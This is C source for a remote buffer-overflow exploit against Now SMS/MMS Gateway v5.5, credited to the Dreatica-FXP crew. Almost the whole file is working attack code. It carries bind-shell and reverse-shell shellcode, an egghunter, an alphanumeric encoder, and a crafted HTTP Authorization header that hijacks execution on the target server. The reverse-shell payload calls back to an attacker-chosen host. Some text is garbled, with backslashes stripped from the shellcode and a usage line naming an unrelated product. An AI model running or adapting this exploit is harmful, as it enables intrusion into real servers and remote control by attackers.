nowsmsmms-overflow.txt
Posted on 31 May 2008
/* Dreatica-FXP crew * * ---------------------------------------- * Target : Now SMS/MMS Gateway v5.5 and others * ---------------------------------------- * Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit * Exploit date : 14.04.2008 * Exploit writer : Heretic2 (heretic2x@gmail.com) * OS : Windows ALL * Tested : Windows 2000 Server * Crew : Dreatica-FXP * Location : http://www.milw0rm.com/ * ---------------------------------------- * Info : We obtain EIP after sending a long Authentificate request to server * Egghunter help here. * ---------------------------------------- * Thanks to: * 1. Luigi Auriemma ( http://aluigi.org <aluigi [at] autistici.org> ) * 2. The Metasploit project ( http://metasploit.com ) * 3. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl> ) * 4. Dreatica-FXP crew ( ) ************************************************************************************ * This was written for educational purpose only. Use it at your own risk. Author will be not be * responsible for any damage, caused by that code. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #include <time.h> #pragma comment(lib,"ws2_32") void usage(char * s); void logo(); void end_logo(); void print_info_banner_line(const char * key, const char * val); void extract_ip_and_port( char * &remotehost, int * port, char * str); int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx); void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret); int hr2_connect(char * remotehost, int port, int timeout); int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout); int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout); int execute(struct _buf * abuf, char * remotehost, int port); struct _buf { unsigned char * ptr; unsigned int size; }; int construct_shellcode(int sh, struct _buf * shf, int target,char * rerverseip, int reverseport); int construct_buffer(struct _buf * shf, int target, struct _buf * abuf); // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring); char *optarg; // global argument pointer int optind = 0, opterr; // global argv index // ----------------------------------------------------------------- // ----------------------------------------------------------------- struct { const char * name; int length; char *shellcode; }shellcodes[]={ {"Bindshell, port 4444 [ args: none ]", 696, /* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ "xebx03x59xebx05xe8xf8xffxffxffx49x49x37x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42" "x58x50x30x42x31x41x42x6bx42x41x52x42x32x42x41x32" "x41x41x30x41x41x58x50x38x42x42x75x6ax49x4bx4cx62" "x4ax68x6bx30x4dx59x78x49x69x4bx4fx79x6fx69x6fx71" "x70x4ex6bx32x4cx51x34x64x64x6ex6bx41x55x77x4cx4c" "x4bx71x6cx35x55x64x38x54x41x58x6fx4cx4bx30x4fx47" "x68x4ex6bx53x6fx47x50x74x41x58x6bx70x49x4cx4bx35" "x64x6cx4bx36x61x68x6ex57x41x79x50x6fx69x4cx6cx6c" "x44x4bx70x63x44x43x37x5ax61x78x4ax44x4dx36x61x6a" "x62x38x6bx78x74x77x4bx51x44x74x64x76x48x51x65x4a" "x45x4ex6bx73x6fx61x34x55x51x5ax4bx71x76x6cx4bx64" "x4cx72x6bx4ex6bx63x6fx57x6cx75x51x7ax4bx33x33x34" "x6cx6cx4bx6ex69x72x4cx45x74x45x4cx30x61x4fx33x50" "x31x69x4bx61x74x6cx4bx57x33x66x50x4ex6bx43x70x64" "x4cx6ex6bx32x50x65x4cx6ex4dx6ex6bx77x30x67x78x31" "x4ex33x58x6cx4ex30x4ex34x4ex5ax4cx50x50x4bx4fx69" "x46x72x46x62x73x70x66x35x38x57x43x35x62x45x38x30" "x77x63x43x44x72x71x4fx71x44x79x6fx4ax70x73x58x78" "x4bx48x6dx4bx4cx77x4bx56x30x79x6fx7ax76x51x4fx6f" "x79x79x75x32x46x4bx31x48x6dx43x38x45x52x70x55x73" "x5ax33x32x6bx4fx4ax70x72x48x69x49x36x69x4cx35x6e" "x4dx50x57x4bx4fx6ax76x36x33x36x33x61x43x33x63x62" "x73x43x73x36x33x50x43x63x63x4bx4fx68x50x43x56x71" "x78x62x31x51x4cx30x66x30x53x6bx39x78x61x4cx55x65" "x38x4ex44x67x6ax74x30x6fx37x70x57x69x6fx6ex36x32" "x4ax36x70x43x61x32x75x79x6fx4ex30x50x68x4fx54x6e" "x4dx64x6ex6dx39x52x77x79x6fx58x56x66x33x36x35x69" "x6fx4ex30x45x38x38x65x72x69x6bx36x77x39x33x67x79" "x6fx6ex36x70x50x31x44x62x74x73x65x6bx4fx58x50x6d" "x43x50x68x4bx57x44x39x4fx36x64x39x71x47x6bx4fx49" "x46x63x65x6bx4fx4ax70x71x76x50x6ax50x64x50x66x70" "x68x50x63x52x4dx6ex69x58x65x32x4ax46x30x63x69x45" "x79x48x4cx4cx49x7ax47x63x5ax70x44x4dx59x78x62x36" "x51x39x50x38x73x4fx5ax6bx4ex41x52x64x6dx6bx4ex32" "x62x36x4cx4ex73x4cx4dx43x4ax34x78x4cx6bx6ex4bx6e" "x4bx51x78x70x72x6bx4ex4ex53x47x66x4bx4fx32x55x50" "x44x4bx4fx7ax76x43x6bx70x57x62x72x46x31x66x31x32" "x71x30x6ax35x51x33x61x32x71x33x65x53x61x4bx4fx5a" "x70x30x68x6ex4dx6ex39x73x35x7ax6ex62x73x4bx4fx48" "x56x63x5ax6bx4fx59x6fx57x47x39x6fx6ex30x4ex6bx30" "x57x59x6cx4bx33x38x44x45x34x59x6fx39x46x50x52x39" "x6fx58x50x65x38x38x70x6ex6ax37x74x53x6fx31x43x6b" "x4fx6ax76x6bx4fx78x50x42" }, {"ReverseShell [ args: -R <ip:port> ]", 287, /* * windows/shell_reverse_tcp - 287 bytes * http://www.metasploit.com * Encoder: generic/none */ "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b" "x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01" "xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07" "xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f" "x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b" "x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c" "x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff" "xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0" "x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08" "x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53" "x53x53x53x43x53x43x53xffxd0x68x7fx00x00x01x66" "x68x11x5cx66x53x89xe1x95x68xecxf9xaax60x57xff" "xd6x6ax10x51x55xffxd0x66x6ax64x66x68x63x6dx6a" "x50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3xaax95" "x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxabx68" "x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51" "x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xff" "xd6x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04" "xffxd6xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6" "xffxd0" }, {NULL, 0, NULL} }; struct _target{ const char *t ; unsigned long ret ; } targets[]= { {"Now SMS/MMS Gateway universal", 0x10002f9d }, {"Now SMS/MMS Gateway v5.5", 0x0027727c }, {"DOS/Crash/Debug/Test/Fun", 0x41414141 }, {NULL, 0x00000000 } }; char egghunter[] = "x33xd2x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05" "x5ax74xefxb8x44x46x58x50x8bxfaxafx75xeaxafx75xe7" "xffxe7"; char header_b[] = "GET / HTTP/1.0 " "User-Agent: "; char header_m[] =" " "Authorization: Basic "; char header_e[] = " "; // memory for buffers unsigned char payloadbuffer[10000], a_buffer[10000]; long dwTimeout=5000; int timeout=5000; // alphanumeric decoder took from "ALPHA 2: Zero-tolerance." code char alphanum_decoder[] = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x37x51x5ax6ax41" "x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42" "x30x42x42x41x42x58x50x38x41x42x75x4ax49"; // alphanumeric encoder took from "ALPHA 2: Zero-tolerance." code int alphanumeric_exec(char *to_encode, int len, char *encoded, int * rlen ) { int i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode); char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars char temp[10]; memset(temp, 0 , sizeof(temp)); srand((int)clock()); for(ii=0;ii<len;ii++) { input = to_encode[ii]; A = (input & 0xf0) >> 4; B = (input & 0x0f); F = B; i = rand() % ((int)strlen(valid_chars)); while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); } E = valid_chars[i] >> 4; D = (A^E); i = rand() % ((int)strlen(valid_chars)); while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); } C = valid_chars[i] >> 4; sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F); encoded[strlen(encoded)]=temp[0]; encoded[strlen(encoded)]=temp[1]; } encoded[strlen(encoded)]='A'; *rlen=(int)strlen(encoded); return 1; } int main(int argc, char **argv) { char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100]; int HAVE_R=0,HAVE_U=0,sh,port=8800,itarget=0,reverseport=9999; struct _buf fshellcode, sbuffer; logo(); if(argc<2) { usage(argv[0]); return -1; } WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); // set defaults sh=0; // ------------ while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF) { switch (c) { case 'h': if (strchr(optarg,':')==NULL) { remotehost=optarg; }else { sscanf(strchr(optarg,':')+1, "%d", &port); remotehost=optarg; *(strchr(remotehost,':'))='�'; } break; case 't': sscanf(optarg, "%d", &itarget); itarget--; break; case 'R': HAVE_R=1; if (strchr(optarg,':')==NULL) { reverseip=optarg; }else { sscanf(strchr(optarg,':')+1, "%d", &reverseport); reverseip=optarg; *(strchr(reverseip,':'))='�'; } break; case 'T': sscanf(optarg, "%ld", &dwTimeout); break; default: usage(argv[0]); WSACleanup(); return -1; } } sh=HAVE_R; if(remotehost == NULL) { printf(" [-] Please enter remotehost "); end_logo(); WSACleanup(); return -1; } print_info_banner_line("Host", remotehost); sprintf(temp1, "%d", port); print_info_banner_line("Port", temp1); print_info_banner_line("Payload", shellcodes[sh].name); if(sh==0) { sprintf(temp1, "%d", 4444); print_info_banner_line("BINDPort", temp1); } if(sh==1) { print_info_banner_line("CB IP", reverseip); sprintf(temp1, "%d", reverseport); print_info_banner_line("CB port", temp1); } printf(" # ------------------------------------------------------------------- # "); fflush(stdout); memset(payloadbuffer, 0, sizeof(payloadbuffer)); fshellcode.ptr=payloadbuffer; fshellcode.size=0; memset(a_buffer, 0, sizeof(a_buffer)); sbuffer.ptr=a_buffer; sbuffer.size=0; if(!construct_shellcode(sh, &fshellcode, itarget, reverseip, reverseport)) { end_logo(); WSACleanup(); return -1; } printf(" [+] Payload constructed "); if(!construct_buffer(&fshellcode, itarget, &sbuffer)) { printf(" [-] Buffer not constructed "); end_logo(); WSACleanup(); return -1; } printf(" [+] Final buffer constructed "); if(!execute(&sbuffer, remotehost, port)) { printf(" [-] Buffer not sent "); end_logo(); WSACleanup(); return -1; } printf(" [+] Buffer sent "); end_logo(); WSACleanup(); return 0; } int construct_shellcode(int sh, struct _buf * shf, int target, char * rerverseip, int reverseport) { int x; char fsh[1000]; memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length); shf->size=shellcodes[sh].length; if(sh==1) { memset(shf->ptr,0,shf->size+1); memset(fsh,0,sizeof(fsh)); memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length); static struct hostent *host = gethostbyname(rerverseip); static struct sockaddr_in addr; if(host == NULL) { printf(" [-] Reverse ip/hostanme is invalid "); return 0; } addr.sin_addr = *(struct in_addr*)host->h_addr; fsh[160] = (addr.sin_addr.S_un.S_un_b.s_b1) ; fsh[161] = (addr.sin_addr.S_un.S_un_b.s_b2) ; fsh[162] = (addr.sin_addr.S_un.S_un_b.s_b3) ; fsh[163] = (addr.sin_addr.S_un.S_un_b.s_b4) ; fsh[166] = ((reverseport >> 8) & 0xff) ; fsh[167] = ((reverseport ) & 0xff) ; memcpy(shf->ptr,alphanum_decoder,sizeof(alphanum_decoder)-1); alphanumeric_exec(fsh, shellcodes[sh].length, (char*)(shf->ptr+sizeof(alphanum_decoder)-1), &x); shf->size = sizeof(alphanum_decoder)-1+x; } return 1; } int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf) { unsigned char * cp, *lp ; char buf[10000],encoded[10000],encoded2[10000], useragent[10000]; int len, slen; // cp=(unsigned char *)useragent; *cp++ = 'x44'; *cp++ = 'x46'; *cp++ = 'x58'; *cp++ = 'x50'; *cp++ = 'x44'; *cp++ = 'x46'; *cp++ = 'x58'; *cp++ = 'x50'; *cp++ = 'x41'; *cp++ = 'x41'; *cp++ = 'x41'; memcpy(cp, shf->ptr, shf->size); cp+=shf->size; slen=(int)(cp-(unsigned char *)useragent); // make egghunter memset(buf, 0, sizeof(buf)); memset(encoded, 0, sizeof(encoded)); memset(encoded2, 0, sizeof(encoded2)); cp=(unsigned char *)buf; memset(cp, 'x41', 129); cp+=129; *cp++ = (unsigned char)((targets[target].ret ) & 0xff); *cp++ = (unsigned char)((targets[target].ret >> 8) & 0xff); *cp++ = (unsigned char)((targets[target].ret >> 16) & 0xff); *cp++ = (unsigned char)((targets[target].ret >> 24) & 0xff); *cp++ = 'x90'; *cp++ = 'x90'; *cp++ = 'x90'; *cp++ = 'x90'; memcpy(cp, egghunter, strlen(egghunter)); cp+=strlen(egghunter); memset(cp, 'x42', 500); cp+=500; len=(int)(cp-(unsigned char * )buf); base64_encode((const unsigned char *)buf,len,(char *)encoded); base64_encode((const unsigned char *)encoded,strlen(encoded),(char *)encoded2); // --- cp = sbuf->ptr; memcpy(cp, header_b,strlen(header_b)); cp+=strlen(header_b); memcpy(cp, useragent,slen); cp+=slen; memcpy(cp, header_m,strlen(header_m)); cp+=strlen(header_m); memcpy(cp, encoded2,strlen(encoded2)); cp+=strlen(encoded2); memcpy(cp, header_e,strlen(header_e)); cp+=strlen(header_e); sbuf->size=(int)(cp-sbuf->ptr); return 1; } void extract_ip_and_port( char * &remotehost, int * port, char * str) { if (strchr(str,':')==NULL) { remotehost=str; }else { sscanf(strchr(str,':')+1, "%d", port); remotehost=str; *(strchr(remotehost,':'))='�'; } } int hr2_connect(char * remotehost, int port, int timeout) { SOCKET s; struct hostent *host; struct sockaddr_in addr; TIMEVAL stTime; TIMEVAL *pstTime = NULL; fd_set x; int res; if (INFINITE != timeout) { stTime.tv_sec = timeout / 1000; stTime.tv_usec = timeout % 1000; pstTime = &stTime; } host = gethostbyname(remotehost); if (!host) return SOCKET_ERROR; addr.sin_addr = *(struct in_addr*)host->h_addr; addr.sin_port = htons(port); addr.sin_family = AF_INET; s = socket(AF_INET, SOCK_STREAM, 0); if (s == SOCKET_ERROR) { closesocket(s); return SOCKET_ERROR; } unsigned long l = 1; ioctlsocket( s, FIONBIO, &l ) ; connect(s, (struct sockaddr*)&addr, sizeof(addr)); FD_ZERO(&x); FD_SET(s, &x); res = select(NULL,NULL,&x,NULL,pstTime); if(res< 0) return SOCKET_ERROR; if(res==0) return 0; return (int)s; } int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout) { return send(s, (char *)buf, len, 0); } int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout) { TIMEVAL stTime; TIMEVAL *pstTime = NULL; fd_set xy; int res; if (INFINITE != timeout) { stTime.tv_sec = timeout / 1000; stTime.tv_usec = timeout % 1000; pstTime = &stTime; } FD_ZERO(&xy); FD_SET(s, &xy); res = select(NULL,&xy,NULL,NULL,pstTime); if(res==0) return 0; if(res<0) return -1; return recv(s, (char *)buf, len, 0); } int execute(struct _buf * abuf, char * remotehost, int port) { int x; SOCKET s ; s = hr2_connect(remotehost, port, 10000); if(s==0) { printf(" [-] connect() timeout "); return 0; } if(s==SOCKET_ERROR) { printf(" [-] Connection failed "); return 0; } x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0); printf(" [+] Sent %d out of %d bytes ", x, abuf->size); closesocket(s); return 1; } // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring) { static char *next = NULL; if (optind == 0) next = NULL; optarg = NULL; if (next == NULL || *next == '�') { if (optind == 0) optind++; if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '�') { optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } if (strcmp(argv[optind], "--") == 0) { optind++; optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } next = argv[optind]; next++; // skip past - optind++; } char c = *next++; char *cp = strchr(optstring, c); if (cp == NULL || c == ':') return '?'; cp++; if (*cp == ':') { if (*next != '�') { optarg = next; next = NULL; } else if (optind < argc) { optarg = argv[optind]; optind++; } else { return '?'; } } return c; } // ----------------------------------------------------------------- // ----------------------------------------------------------------- // ----------------------------------------------------------------- // ----------------------------------------------------------------- // BASE64 // ----------------------------------------------------------------- char base64_chars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" "abcdefghijklmnopqrstuvwxyz" "0123456789+/"; static inline bool is_base64(unsigned char c) { return (isalnum(c) || (c == '+') || (c == '/')); } void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) { int i = 0; int j = 0; unsigned char char_array_3[3]; unsigned char char_array_4[4]; while (in_len--) { char_array_3[i++] = *(bytes_to_encode++); if (i == 3) { char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); char_array_4[3] = char_array_3[2] & 0x3f; for(i = 0; (i <4) ; i++) ret[strlen(ret)]=base64_chars[char_array_4[i]]; i = 0; } } if (i) { for(j = i; j < 3; j++) char_array_3[j] = '�'; char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); char_array_4[3] = char_array_3[2] & 0x3f; for (j = 0; (j < i + 1); j++) ret[strlen(ret)]=base64_chars[char_array_4[j]]; while((i++ < 3)) ret[strlen(ret)]='='; } } // ----------------------------------------------------------------- // End of BASE64 // ----------------------------------------------------------------- void print_info_banner_line(const char * key, const char * val) { char temp1[100], temp2[100]; memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen(val) -1); memset(temp2,0,sizeof(temp2)); memset(temp2, 'x20' , 8 - strlen(key)); printf(" # %s%s: %s%s# ", key, temp2, val, temp1); } void usage(char * s) { int j; printf(" "); printf(" Usage: %s -h <host:port> -t <target> -R <host:port> ", s); printf(" ------------------------------------------------------------------- "); printf(" Arguments: "); printf(" -h ........ host to attack, default port: 8800 "); printf(" -t ........ target to use "); printf(" -R ........ host and port for back connect "); printf(" -T ........ socket timeout "); printf(" "); printf(" Supported ASUS DPCProxy versions: "); for(j=0; targets[j].t!=0;j++) { printf(" %d. %s ",j+1, targets[j].t); } printf(" "); for(j=0; shellcodes[j].name!=0;j++) { printf(" %d. %s ",j+1, shellcodes[j].name); } end_logo(); } void logo() { printf(" "); printf(" ####################################################################### "); printf(" # ____ __ _ ______ __ _____ # "); printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / # "); printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / # "); printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ # "); printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ # "); printf(" # crew # "); printf(" ####################################################################### "); printf(" # Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit # "); printf(" # Author : Heretic2 (http://www.dreatica.cl/) # "); printf(" # Version : 1.0 # "); printf(" # System : Windows ALL # "); printf(" # Date : 14.04.2008 # "); printf(" # ------------------------------------------------------------------- # "); } void end_logo() { printf(" # ------------------------------------------------------------------- # "); printf(" # Dreatica-FXP crew [Heretic2] # "); printf(" ####################################################################### "); }
